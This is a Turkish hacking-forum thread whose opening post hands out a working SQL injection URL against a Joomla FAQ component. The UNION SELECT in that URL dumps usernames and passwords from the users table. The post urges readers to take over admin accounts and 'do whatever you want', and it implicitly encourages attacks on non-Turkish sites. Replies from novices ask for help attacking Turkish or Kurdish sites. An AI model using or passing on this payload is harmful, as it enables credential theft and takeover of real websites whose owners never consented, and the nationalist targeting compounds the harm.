site hacklemek garantili

casus19

Üye
25 Ağu 2007
209
20
Cyber-warrior tim'den alıntıdır!

Açığımız joomla sql enjeksiyon Açığı Tabii ben kendisini fazla sevmem :) :) çünkü bazen hash'ler

kırılmıyor...

https://tik.lat/01Cov site/index.php?option=com_simplefaq&task=answer&Itemid=9999&catid=9999&aid=-1/**/union/**/select/**/0,username,password,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0/**/from/**/mos_users/*

Şeklinde yapınn sonra eğer açık varsa kullanıcı adları ve şifreleri çıkar!
sonra şifreyi değiştirin.
ve İSTEDİĞİNİZİ YAPIN

1vh8gd6gu0vw2km31pp6tk0.jpg

Türk sitelerini hackliyenlere VE REP vermeyenlere(yoksa canınız sağolsun) hakkım haramdır.:diablo:diablo:diablo:diablo:diablo:diablo

Son düzenleme:

Sanalhaydut35½

Kıdemli Üye
28 Tem 2007
4,942
37
kArŞıyaKa
bi sitede denedim kodu yazdım sayfa görüntülenemiyor çıktı bitane daha denedim kodu yazdım sayfa yeniden açıldı ama şifreler mifreler gelmedi

by_sirin

Yeni üye
11 Eki 2007
2
0
ßénim Hackér Lazım Türk Sitélér Saldırmak İstiyorum Hnackér İhtiyacim Lütfén ßékliyorum Sizi;)

By_MemocaN

Yeni üye
23 Eki 2007
4
0
nasıl yapacağım ya bi türli yapamıyorum bi hacker bana yardımcı olabilirmi lütfen yardım etmek istiyen msn mi eklesin Rica Ediyorum. Ben Hacker Olmak İstiyorum Hemde Çook :( ama Yapamıyorum Lütfen Birisi Yardım Etsin Lütfen [email protected] Rica Ediyorum Lütfeeen :((

By_MemocaN

Yeni üye
23 Eki 2007
4
0
Ben Kürt Sitelerine Saldırmak İstiyorummm Bi HAcker Yardımcı Olsun Bana Lütfenn :nasıl yapacağım ya bi türli yapamıyorum bi hacker bana yardımcı olabilirmi lütfen yardım etmek istiyen msn mi eklesin Rica Ediyorum. Ben Hacker Olmak İstiyorum Hemde Çook :( ama Yapamıyorum Lütfen Birisi Yardım Etsin Lütfen [email protected] Rica Ediyorum Lütfeeen

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.